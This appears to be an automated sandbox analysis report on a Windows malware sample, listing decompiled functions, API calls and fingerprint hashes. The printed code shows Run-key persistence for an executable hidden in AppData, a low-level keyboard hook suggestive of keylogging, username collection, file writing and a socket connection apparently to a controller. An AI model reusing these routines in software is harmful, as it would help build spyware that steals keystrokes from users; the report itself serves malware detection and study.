                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t22 = 0;
                                        					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17); // executed
                                        					RegCloseKey(_a8); // executed
                                        					if(_t18 == 0) {
                                        						_t22 = 1;
                                        					}
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					return _t22;
                                        				}
                                        			}

                                        0x0040b7c6
                                        0x0040b7ce
                                        0x0040b81f
                                        0x0040b828
                                        0x0040b7d0
                                        0x0040b7d5
                                        0x0040b7db
                                        0x0040b7e3
                                        0x0040b7ea
                                        0x0040b7f6
                                        0x0040b801
                                        0x0040b809
                                        0x0040b80b
                                        0x0040b80b
                                        0x0040b810
                                        0x0040b81b
                                        0x0040b81b

                                        APIs
                                        • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7D5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7E3
                                        • RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                        • RegCloseKey.KERNELBASE(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B801
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 0040B81F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 1037601705-0
                                        • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                        • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                        • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                        				char* _t13;
                                        				long _t15;
                                        				void* _t18;
                                        				int _t19;
                                        				void* _t25;
                                        
                                        				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
                                        				if(_t13 != 0) {
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return 0;
                                        				} else {
                                        					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t19 = 0;
                                        					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
                                        					RegCloseKey(_a8);
                                        					if(_t15 == 0) {
                                        						_t19 = 1;
                                        					}
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return _t19;
                                        				}
                                        			}

                                        APIs
                                        • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                        • RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                        • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                        • String ID:
                                        • API String ID: 2159132150-0
                                        • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                        • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                        • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E00405532(void* __ecx) {
                                        				signed int _t8;
                                        				WCHAR* _t9;
                                        				long _t12;
                                        				void* _t21;
                                        				void* _t22;
                                        				void* _t28;
                                        
                                        				_t8 =  *0x41b988; // 0x989680
                                        				_t9 = _t8 |  *0x41b98c;
                                        				_t22 = __ecx;
                                        				if(_t9 != 0) {
                                        					 *((char*)(__ecx + 0x30)) = 0;
                                        					do {
                                        						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                        						_t21 = _t9;
                                        						if(_t21 == 0xffffffff) {
                                        							 *((char*)(_t22 + 0x30)) = 0;
                                        						} else {
                                        							_t12 = GetFileSize(_t21, 0);
                                        							_t28 = 0 -  *0x41b98c; // 0x0
                                        							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
                                        								 *((char*)(_t22 + 0x30)) = 1;
                                        								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
                                        									E00405D50(_t22);
                                        								}
                                        								Sleep(0x2710);
                                        							}
                                        							_t9 = FindCloseChangeNotification(_t21); // executed
                                        						}
                                        					} while ( *((char*)(_t22 + 0x30)) == 1);
                                        					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
                                        						return E00405180(_t22);
                                        					}
                                        				}
                                        				return _t9;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                        • CreateFileW.KERNELBASE(00000000), ref: 00405569
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                        • Sleep.KERNEL32(00002710), ref: 004055A7
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                        • String ID:
                                        • API String ID: 3579047504-0
                                        • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                        • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                        • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00412163(intOrPtr _a4) {
                                        				char _v5;
                                        				char _v12;
                                        				long _v16;
                                        				char _v32;
                                        				void* _v48;
                                        				char _v80;
                                        				short _v592;
                                        				char* _t23;
                                        				char* _t25;
                                        
                                        				_v12 = 0x10;
                                        				 *0x41c1e8(1,  &_v80,  &_v12); // executed
                                        				_v16 = 0x100;
                                        				GetUserNameW( &_v592,  &_v16); // executed
                                        				_t23 =  &_v5;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
                                        				_t25 =  &_v32;
                                        				L0041416A();
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _a4;
                                        			}

                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                        • String ID:
                                        • API String ID: 3382107156-0
                                        • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                        • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                        • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                        				long _v8;
                                        				long _v12;
                                        				intOrPtr _t14;
                                        				void* _t15;
                                        				int _t17;
                                        				long _t19;
                                        				long _t20;
                                        				long _t22;
                                        				long _t24;
                                        				void* _t28;
                                        
                                        				_t24 = 0;
                                        				_t14 = _a16;
                                        				if(_t14 == 0) {
                                        					_v12 = 0x40000000;
                                        					_v8 = 2;
                                        				} else {
                                        					if(_t14 == 1) {
                                        						_t22 = 4;
                                        						_v12 = _t22;
                                        						_v8 = _t22;
                                        					}
                                        				}
                                        				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
                                        				_t28 = _t15;
                                        				if(_t28 != 0xffffffff) {
                                        					if(_a16 != 1) {
                                        						L8:
                                        						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
                                        						if(_t17 != 0) {
                                        							_t24 = 1;
                                        						}
                                        						L10:
                                        						CloseHandle(_t28);
                                        						_t19 = _t24;
                                        						goto L11;
                                        					}
                                        					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
                                        					if(_t20 == 0xffffffff) {
                                        						goto L10;
                                        					}
                                        					goto L8;
                                        				} else {
                                        					_t19 = 0;
                                        					L11:
                                        					return _t19;
                                        				}
                                        			}

                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 00412DAF
                                        • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 00412DC6
                                        • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandlePointerWrite
                                        • String ID:
                                        • API String ID: 3604237281-0
                                        • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                        • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                        • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                        • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                        • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                        • String ID:
                                        • API String ID: 2462357041-0
                                        • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                        • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                        • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004052D5(struct HHOOK__** __ecx) {
                                        				struct tagMSG _v32;
                                        				struct HHOOK__* _t11;
                                        				struct HHOOK__** _t14;
                                        
                                        				_t14 = __ecx;
                                        				 *0x41b9a8 = __ecx;
                                        				if( *((intOrPtr*)(__ecx)) != 0) {
                                        					L3:
                                        					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                        						TranslateMessage( &_v32);
                                        						DispatchMessageA( &_v32);
                                        						goto L2;
                                        					}
                                        				} else {
                                        					_t11 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // executed
                                        					 *_t14 = _t11;
                                        					L2:
                                        					if( *_t14 != 0) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchHookTranslateWindows
                                        • String ID:
                                        • API String ID: 1978648212-0
                                        • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                        • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                        • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 2505548081-0
                                        • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                        • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                        • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                        				int _v8;
                                        				int _v12;
                                        				int _t14;
                                        				long _t16;
                                        				long _t20;
                                        				signed int _t21;
                                        
                                        				_t14 = 4;
                                        				_v8 = _t14;
                                        				_v12 = _t14;
                                        				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                        				if(_t16 != 0) {
                                        					return 0;
                                        				} else {
                                        					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
                                        					_t21 = RegCloseKey(_a8); // executed
                                        					return _t21 & 0xffffff00 | _t20 == 0x00000000;
                                        				}
                                        			}

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                        • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                        • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                        • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                        • String ID:
                                        • API String ID: 4160275866-0
                                        • Opcode ID: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                        • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                        • Opcode Fuzzy Hash: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                        • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: __dllonexit_onexit
                                        • String ID:
                                        • API String ID: 2384194067-0
                                        • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                        • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E00402038(intOrPtr* __ecx) {
                                        				intOrPtr _t6;
                                        				intOrPtr* _t9;
                                        
                                        				_t9 = __ecx;
                                        				if( *0x41b730 != 0) {
                                        					L2:
                                        					_push(6);
                                        					_push(1);
                                        					_push(0); // executed
                                        					L0041418E(); // executed
                                        					 *_t9 = _t6;
                                        					if(_t6 != 0xffffffff) {
                                        						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
                                        						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
                                        						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
                                        						return _t6;
                                        					} else {
                                        						goto L3;
                                        					}
                                        				} else {
                                        					_t6 = E00402074(); // executed
                                        					if(_t6 == 0) {
                                        						L3:
                                        						return 0;
                                        					} else {
                                        						goto L2;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 00402074: WSAStartup.WS2_32(00000202,?), ref: 00402089
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Startupsocket
                                        • String ID:
                                        • API String ID: 3996037109-0
                                        • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                        • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                        • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                        • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0040209B(intOrPtr* __ecx, void* _a4) {
                                        				signed int _t3;
                                        
                                        				_t1 = __ecx + 4; // 0x41be74
                                        				_t3 = _t1;
                                        				_push(0x10);
                                        				asm("movsd");
                                        				asm("movsd");
                                        				asm("movsd");
                                        				_push(_t3);
                                        				_push( *__ecx);
                                        				asm("movsd"); // executed
                                        				L0041419A(); // executed
                                        				asm("sbb al, al");
                                        				return  ~_t3 + 1;
                                        			}

                                        APIs
                                        • connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: connect
                                        • String ID:
                                        • API String ID: 1959786783-0
                                        • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                        • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                        • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                        • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E00402074() {
                                        				char _v404;
                                        				signed int _t2;
                                        				char _t4;
                                        
                                        				_t2 =  &_v404;
                                        				_push(_t2);
                                        				_push(0x202); // executed
                                        				L00414194(); // executed
                                        				asm("sbb al, al");
                                        				_t4 =  ~_t2 + 1;
                                        				 *0x41b730 = _t4;
                                        				return _t4;
                                        			}

                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 00402089
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
